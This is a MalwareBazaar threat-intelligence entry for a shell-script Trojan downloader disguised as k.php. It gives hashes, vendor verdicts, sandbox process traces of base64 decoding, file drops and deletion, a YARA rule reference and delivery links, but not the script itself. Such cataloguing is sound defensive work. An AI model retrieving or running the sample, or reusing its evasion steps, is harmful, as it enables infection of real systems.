MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534
SHA3-384 hash: 50062d2c220ece79a08886c070850484ffc207b3ceb550d69c7711c23bbe4ecc252f8ea9c2be49d7bbcdf8cee7526b9e
SHA1 hash: 2d969c0a1e6b67f7067d617045ba554fc5fee8a7
MD5 hash: 648ed31c1891325ff0be0d9b06403c03
humanhash: cold-orange-island-tango
File name:k.php
Download: download sample
File size:19'499 bytes
First seen:2026-03-09 09:46:32 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 384:GFcuQpWx+BL0SWL0gkzsO9a4cbddrME8jyfzsO9a4cbddrME8jy4:GF8i+BL0SI07zsP4cbddr7zsP4cbddrk
TLSH T1BA925CB512896C79FBD0CE399F3C7F4DADE882C42124A3ACBA0F39215A1166DC60535A
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:sh

Intelligence

File Origin
# of uploads :
1
# of downloads :
52
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
SecuriteInfo.com.Linux.MulDrop.187.12502.24465.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
evasive masquerade
Link:
https://www.filescan.io/uploads/69ae97229eaae84659461acb/reports/f54e91d9-2e8b-4222-8f55-fafcc3fc7c4c/overview
Verdict:
Malicious
File Type:
unix shell
Detections:
HEUR:Trojan-Downloader.Shell.Agent.bc
Link:
https://opentip.kaspersky.com/2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/6c6d7727-8732-40a3-9972-48f9a6282214
Behavior Graph:
Download SVG
%3 guuid=91b742af-1600-0000-4a98-f9fe170d0000 pid=3351 /usr/bin/sudo guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356 /tmp/sample.bin guuid=91b742af-1600-0000-4a98-f9fe170d0000 pid=3351->guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356 execve guuid=2ace3bb1-1600-0000-4a98-f9fe1e0d0000 pid=3358 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=2ace3bb1-1600-0000-4a98-f9fe1e0d0000 pid=3358 clone guuid=748342b1-1600-0000-4a98-f9fe1f0d0000 pid=3359 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=748342b1-1600-0000-4a98-f9fe1f0d0000 pid=3359 clone guuid=8f4168b1-1600-0000-4a98-f9fe200d0000 pid=3360 /usr/bin/mkdir guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=8f4168b1-1600-0000-4a98-f9fe200d0000 pid=3360 execve guuid=2713c4b1-1600-0000-4a98-f9fe210d0000 pid=3361 /usr/bin/mkdir guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=2713c4b1-1600-0000-4a98-f9fe210d0000 pid=3361 execve guuid=cc3c10b2-1600-0000-4a98-f9fe230d0000 pid=3363 /usr/bin/mkdir guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=cc3c10b2-1600-0000-4a98-f9fe230d0000 pid=3363 execve guuid=3bcf5cb2-1600-0000-4a98-f9fe250d0000 pid=3365 /usr/bin/mkdir guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=3bcf5cb2-1600-0000-4a98-f9fe250d0000 pid=3365 execve guuid=99c3afb2-1600-0000-4a98-f9fe270d0000 pid=3367 /usr/bin/mkdir guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=99c3afb2-1600-0000-4a98-f9fe270d0000 pid=3367 execve guuid=966501b3-1600-0000-4a98-f9fe280d0000 pid=3368 /usr/bin/mkdir guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=966501b3-1600-0000-4a98-f9fe280d0000 pid=3368 execve guuid=42ed5eb3-1600-0000-4a98-f9fe290d0000 pid=3369 /usr/bin/mkdir guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=42ed5eb3-1600-0000-4a98-f9fe290d0000 pid=3369 execve guuid=5278b0b3-1600-0000-4a98-f9fe2b0d0000 pid=3371 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=5278b0b3-1600-0000-4a98-f9fe2b0d0000 pid=3371 execve guuid=848c26b4-1600-0000-4a98-f9fe2c0d0000 pid=3372 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=848c26b4-1600-0000-4a98-f9fe2c0d0000 pid=3372 execve guuid=c0c89bb4-1600-0000-4a98-f9fe2d0d0000 pid=3373 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=c0c89bb4-1600-0000-4a98-f9fe2d0d0000 pid=3373 execve guuid=ff184cb5-1600-0000-4a98-f9fe2e0d0000 pid=3374 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=ff184cb5-1600-0000-4a98-f9fe2e0d0000 pid=3374 execve guuid=50e7a5b5-1600-0000-4a98-f9fe310d0000 pid=3377 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=50e7a5b5-1600-0000-4a98-f9fe310d0000 pid=3377 execve guuid=e3c321b6-1600-0000-4a98-f9fe340d0000 pid=3380 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=e3c321b6-1600-0000-4a98-f9fe340d0000 pid=3380 execve guuid=91d99ab6-1600-0000-4a98-f9fe360d0000 pid=3382 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=91d99ab6-1600-0000-4a98-f9fe360d0000 pid=3382 execve guuid=b7c5fbb6-1600-0000-4a98-f9fe390d0000 pid=3385 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=b7c5fbb6-1600-0000-4a98-f9fe390d0000 pid=3385 execve guuid=91956db7-1600-0000-4a98-f9fe3b0d0000 pid=3387 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=91956db7-1600-0000-4a98-f9fe3b0d0000 pid=3387 execve guuid=5feed9b7-1600-0000-4a98-f9fe3d0d0000 pid=3389 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=5feed9b7-1600-0000-4a98-f9fe3d0d0000 pid=3389 execve guuid=a4c93db8-1600-0000-4a98-f9fe3f0d0000 pid=3391 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=a4c93db8-1600-0000-4a98-f9fe3f0d0000 pid=3391 execve guuid=44d48fb8-1600-0000-4a98-f9fe420d0000 pid=3394 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=44d48fb8-1600-0000-4a98-f9fe420d0000 pid=3394 execve guuid=05a606b9-1600-0000-4a98-f9fe440d0000 pid=3396 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=05a606b9-1600-0000-4a98-f9fe440d0000 pid=3396 execve guuid=1ef55cb9-1600-0000-4a98-f9fe460d0000 pid=3398 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=1ef55cb9-1600-0000-4a98-f9fe460d0000 pid=3398 execve guuid=b067c4b9-1600-0000-4a98-f9fe490d0000 pid=3401 /usr/bin/cp guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=b067c4b9-1600-0000-4a98-f9fe490d0000 pid=3401 execve guuid=86f229ba-1600-0000-4a98-f9fe4a0d0000 pid=3402 /usr/bin/touch guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=86f229ba-1600-0000-4a98-f9fe4a0d0000 pid=3402 execve guuid=f57367ba-1600-0000-4a98-f9fe4c0d0000 pid=3404 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=f57367ba-1600-0000-4a98-f9fe4c0d0000 pid=3404 clone guuid=7cef6dba-1600-0000-4a98-f9fe4d0d0000 pid=3405 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=7cef6dba-1600-0000-4a98-f9fe4d0d0000 pid=3405 clone guuid=e64d87ba-1600-0000-4a98-f9fe4e0d0000 pid=3406 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=e64d87ba-1600-0000-4a98-f9fe4e0d0000 pid=3406 clone guuid=01bd8dba-1600-0000-4a98-f9fe4f0d0000 pid=3407 /usr/bin/base64 write-file guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=01bd8dba-1600-0000-4a98-f9fe4f0d0000 pid=3407 execve guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410 execve guuid=5fedfbbf-1600-0000-4a98-f9fe740d0000 pid=3444 /usr/bin/rm delete-file guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=5fedfbbf-1600-0000-4a98-f9fe740d0000 pid=3444 execve guuid=b14445c0-1600-0000-4a98-f9fe760d0000 pid=3446 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=b14445c0-1600-0000-4a98-f9fe760d0000 pid=3446 clone guuid=2fbe4bc0-1600-0000-4a98-f9fe770d0000 pid=3447 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=2fbe4bc0-1600-0000-4a98-f9fe770d0000 pid=3447 clone guuid=e75570c0-1600-0000-4a98-f9fe790d0000 pid=3449 /usr/bin/bash guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=e75570c0-1600-0000-4a98-f9fe790d0000 pid=3449 execve guuid=78bfc1c0-1600-0000-4a98-f9fe7b0d0000 pid=3451 /usr/bin/rm guuid=b163f1b0-1600-0000-4a98-f9fe1c0d0000 pid=3356->guuid=78bfc1c0-1600-0000-4a98-f9fe7b0d0000 pid=3451 execve guuid=252b49bb-1600-0000-4a98-f9fe530d0000 pid=3411 /usr/bin/bash guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=252b49bb-1600-0000-4a98-f9fe530d0000 pid=3411 clone guuid=b6d04dbb-1600-0000-4a98-f9fe540d0000 pid=3412 /usr/bin/bash guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=b6d04dbb-1600-0000-4a98-f9fe540d0000 pid=3412 clone guuid=9b0f6dbb-1600-0000-4a98-f9fe560d0000 pid=3414 /usr/bin/ls guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=9b0f6dbb-1600-0000-4a98-f9fe560d0000 pid=3414 execve guuid=0fd0d2bb-1600-0000-4a98-f9fe580d0000 pid=3416 /usr/bin/cat guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=0fd0d2bb-1600-0000-4a98-f9fe580d0000 pid=3416 execve guuid=6b5c1dbc-1600-0000-4a98-f9fe5a0d0000 pid=3418 /usr/bin/ls guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=6b5c1dbc-1600-0000-4a98-f9fe5a0d0000 pid=3418 execve guuid=9c1ea2bc-1600-0000-4a98-f9fe5d0d0000 pid=3421 /usr/bin/mkdir guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=9c1ea2bc-1600-0000-4a98-f9fe5d0d0000 pid=3421 execve guuid=32bd02bd-1600-0000-4a98-f9fe5f0d0000 pid=3423 /usr/bin/mv guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=32bd02bd-1600-0000-4a98-f9fe5f0d0000 pid=3423 execve guuid=e8c364bd-1600-0000-4a98-f9fe620d0000 pid=3426 /usr/bin/bash guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=e8c364bd-1600-0000-4a98-f9fe620d0000 pid=3426 clone guuid=fa536bbd-1600-0000-4a98-f9fe630d0000 pid=3427 /usr/bin/base64 write-file guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=fa536bbd-1600-0000-4a98-f9fe630d0000 pid=3427 execve guuid=b725b4bd-1600-0000-4a98-f9fe650d0000 pid=3429 /usr/bin/rm delete-file guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=b725b4bd-1600-0000-4a98-f9fe650d0000 pid=3429 execve guuid=f1f610be-1600-0000-4a98-f9fe670d0000 pid=3431 /usr/bin/ls guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=f1f610be-1600-0000-4a98-f9fe670d0000 pid=3431 execve guuid=a43482be-1600-0000-4a98-f9fe6a0d0000 pid=3434 /usr/bin/bash guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=a43482be-1600-0000-4a98-f9fe6a0d0000 pid=3434 clone guuid=321489be-1600-0000-4a98-f9fe6b0d0000 pid=3435 /usr/bin/base64 write-file guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=321489be-1600-0000-4a98-f9fe6b0d0000 pid=3435 execve guuid=07c9d0be-1600-0000-4a98-f9fe6d0d0000 pid=3437 /usr/bin/ls guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=07c9d0be-1600-0000-4a98-f9fe6d0d0000 pid=3437 execve guuid=fbd834bf-1600-0000-4a98-f9fe700d0000 pid=3440 /usr/bin/cat guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=fbd834bf-1600-0000-4a98-f9fe700d0000 pid=3440 execve guuid=d6127bbf-1600-0000-4a98-f9fe720d0000 pid=3442 /usr/bin/ls guuid=3409ffba-1600-0000-4a98-f9fe520d0000 pid=3410->guuid=d6127bbf-1600-0000-4a98-f9fe720d0000 pid=3442 execve
Score:
80%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534
Threat name:
Script-Shell.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2026-03-09 09:47:15 UTC
File Type:
Text (Shell)
AV detection:
13 of 24 (54.17%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ftf47bhtlx65mchlo7lyxlr57zhwawofyg4kubyiyhkngfntqu2a._file
Result
Malware family:
n/a
Score:
  4/10
Tags:
defense_evasion discovery linux
Link:
https://tria.ge/reports/260309-lsavbadt4l/
Behaviour
Reads runtime system information
Writes file to tmp directory
Deobfuscate/Decode Files or Information
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:SUSP_LNX_Base64_Exec_Apr24
Create hunting rule
Author:Christian Burkard
Description:Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Reference:Internal Research

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh 2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3792476/
  
Delivery method
Distributed via web download

Comments